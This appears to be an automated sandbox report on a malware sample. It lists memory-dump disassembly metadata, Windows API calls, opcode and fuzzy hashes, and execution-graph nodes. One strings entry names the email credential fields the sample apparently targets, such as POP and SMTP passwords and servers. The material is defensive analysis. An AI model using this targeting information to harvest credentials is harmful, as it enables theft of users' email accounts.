                                                                                    • String ID:
                                                                                    • API String ID: 1263568516-0
                                                                                    • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                                    • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                                                                    • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                                    • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                                                                    APIs
                                                                                    • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                                    • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                                                                    • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                                    • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                                    • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                                                                    • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                                    • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                                                                    APIs
                                                                                    • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                                                    • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                                                                    • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                                                    • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                                                                    APIs
                                                                                    • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                                                    • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                                                                    • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                                                    • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 0040438F
                                                                                    • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                                                    • VariantInit.OLEAUT32(?), ref: 004043C4
                                                                                    • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                                                    • VariantInit.OLEAUT32(?), ref: 00404414
                                                                                    • SysAllocString.OLEAUT32(?), ref: 00404419
                                                                                    • VariantInit.OLEAUT32(?), ref: 00404431
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                                                    • String ID:
                                                                                    • API String ID: 1312198159-0
                                                                                    • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                                    • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                                                    • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                                    • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                                    • API String ID: 0-2111798378
                                                                                    • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                                    • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                                                    • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                                    • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                    • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                                                    • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                    • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

                                                                                    Execution Graph

                                                                                    Execution Coverage:8.5%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:18
                                                                                    Total number of Limit Nodes:2
                                                                                    execution_graph 10580 25ae698 10581 25ae6da 10580->10581 10582 25ae6e0 GetModuleHandleW 10580->10582 10581->10582 10583 25ae70d 10582->10583 10584 25a7870 10585 25a787a 10584->10585 10587 25a7d68 10584->10587 10588 25a7d6c 10587->10588 10592 25a7e78 10588->10592 10596 25a7e67 10588->10596 10594 25a7e9f 10592->10594 10593 25a7f7c 10593->10593 10594->10593 10600 25a7a8c 10594->10600 10598 25a7e6c 10596->10598 10597 25a7f7c 10597->10597 10598->10597 10599 25a7a8c CreateActCtxA 10598->10599 10599->10597 10601 25a8f08 CreateActCtxA 10600->10601 10603 25a8fcb 10601->10603

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 661 25a8efc-25a8f06 662 25a8f0a-25a8fc9 CreateActCtxA 661->662 663 25a8f08-25a8f09 661->663 665 25a8fcb-25a8fd1 662->665 666 25a8fd2-25a902c 662->666 663->662 665->666 673 25a903b-25a903f 666->673 674 25a902e-25a9031 666->674 675 25a9050 673->675 676 25a9041-25a904d 673->676 674->673 678 25a9051 675->678 676->675 678->678
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 025A8FB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000009.00000002.2059052363.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_9_2_25a0000_IOsbBBIDAm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: c6b711da76322d897792d3ab4e200d1124d182780173e4936928cd28f0c02e68
                                                                                    • Instruction ID: 2a67da4b808da79dc8a7d5d534ead37c0af791bfac358e5c823aa60ef19c8502
                                                                                    • Opcode Fuzzy Hash: c6b711da76322d897792d3ab4e200d1124d182780173e4936928cd28f0c02e68
                                                                                    • Instruction Fuzzy Hash: 5341EFB0C00719CEDB24CFA9C845BDEBBF5BF48304F2480AAD408AB265DB756985CF94

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 679 25a7a8c-25a8fc9 CreateActCtxA 683 25a8fcb-25a8fd1 679->683 684 25a8fd2-25a902c 679->684 683->684 691 25a903b-25a903f 684->691 692 25a902e-25a9031 684->692 693 25a9050 691->693 694 25a9041-25a904d 691->694 692->691 696 25a9051 693->696 694->693 696->696
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 025A8FB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000009.00000002.2059052363.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_9_2_25a0000_IOsbBBIDAm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 44b64931486bb30225544dbb7d9908cf240e1ea70052194b5376e8428507393b
                                                                                    • Instruction ID: 96762e362fb55be9fe8b94eb43996271f7fc4a47ee4a1636591ad73a70e1b50f
                                                                                    • Opcode Fuzzy Hash: 44b64931486bb30225544dbb7d9908cf240e1ea70052194b5376e8428507393b
                                                                                    • Instruction Fuzzy Hash: 7641EEB0C00719CFDB24CFA9C845B9EBBF5BF48304F2481AAD408AB255EB756985CF94

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 697 25ae698-25ae6d8 698 25ae6da-25ae6dd 697->698 699 25ae6e0-25ae70b GetModuleHandleW 697->699 698->699 700 25ae70d-25ae713 699->700 701 25ae714-25ae728 699->701 700->701
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 025AE6FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000009.00000002.2059052363.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_9_2_25a0000_IOsbBBIDAm.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 9a04bf8a4c6285ffd36835cb4f43b9e5587fad90224d1dcc36b0a89a0039fc76
                                                                                    • Instruction ID: 62ccfef0481f9d6ed5f562ff021d3a10990d9bb2dd77a8464a1a0c896d621e54
                                                                                    • Opcode Fuzzy Hash: 9a04bf8a4c6285ffd36835cb4f43b9e5587fad90224d1dcc36b0a89a0039fc76
                                                                                    • Instruction Fuzzy Hash: 1A11E0B5D00349CFCB10CF9AD845ADEFBF4BB88324F10886AD559A7210D375A545CFA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000009.00000002.2057824008.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_9_2_a6d000_IOsbBBIDAm.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ef00e3659b4b250a8af55f4ba77cd5198408b18718ac9b7e5f28c7dc314687dd
                                                                                    • Instruction ID: 089a5f3b73b0be58e929c82849cb513e68e714c280a10d55b0a0d977dfceade1
                                                                                    • Opcode Fuzzy Hash: ef00e3659b4b250a8af55f4ba77cd5198408b18718ac9b7e5f28c7dc314687dd
                                                                                    • Instruction Fuzzy Hash: 40212271A00240EFCB05DF14D9C4B2ABF75FB98358F24C569E90A4B656C336D856CAA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000009.00000002.2057987190.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_9_2_a7d000_IOsbBBIDAm.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 752b5a1a8b88e1fd2d052d5fa9561f7485a75f5029a2d5b532a9dd4e700486b8
                                                                                    • Instruction ID: 0e0f53880e9154028189c96850f0a580838a404455536556fb1c600940d4fb00
                                                                                    • Opcode Fuzzy Hash: 752b5a1a8b88e1fd2d052d5fa9561f7485a75f5029a2d5b532a9dd4e700486b8
                                                                                    • Instruction Fuzzy Hash: ED21DE75604200EFCB14DF24D984B26BBB5EF88314F24C569E80E4B296C33AD847CA61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000009.00000002.2057824008.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_9_2_a6d000_IOsbBBIDAm.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                    • Instruction ID: fbf951d1b86770d39b6600c675957e623a997611b392040cc7a110cecc0fab3c
                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                    • Instruction Fuzzy Hash: 5711D376904280CFCB16CF14D5C4B16BF71FB94318F24C6AAD84A0F656C336D85ACBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000009.00000002.2057987190.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_9_2_a7d000_IOsbBBIDAm.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                    • Instruction ID: 47a7d75c30f9f2addbc3b22bc2d10e284224db9141eceb1d8841d7a379e4d30b
                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                    • Instruction Fuzzy Hash: 33118E75504280DFDB15CF14D9C4B15BB71FB44314F24C6AAD84E4B656C33AD85BCB61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000009.00000002.2057824008.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_9_2_a6d000_IOsbBBIDAm.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dbbb83b47e1b0acb83a11a2bfdd1fcc23b41f6a2f55b4a94a4dd85164f5248f9
                                                                                    • Instruction ID: 7abe57eae5a7fc525624a13f851a3d3f7a0096aedc8fe498b0c62a1a683e1572
                                                                                    • Opcode Fuzzy Hash: dbbb83b47e1b0acb83a11a2bfdd1fcc23b41f6a2f55b4a94a4dd85164f5248f9
                                                                                    • Instruction Fuzzy Hash: 4101F731A083449AE7108B25CD84767BFB8EF40364F18C429ED084E186C238D840C6B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000009.00000002.2057824008.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_9_2_a6d000_IOsbBBIDAm.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 32e34756bcfba69aab56d4f6fba6036070285b6049e28c213813131f461a69df
                                                                                    • Instruction ID: 6718a8bb02d285ee1fd75bfd6b6e0aa30cdb18f1111847f1ec682ae2ddcf5645
                                                                                    • Opcode Fuzzy Hash: 32e34756bcfba69aab56d4f6fba6036070285b6049e28c213813131f461a69df
                                                                                    • Instruction Fuzzy Hash: 22F0C2715083449EE7108B16CC84B62FFA8EB90374F18C45AED080E286C2799840CAB1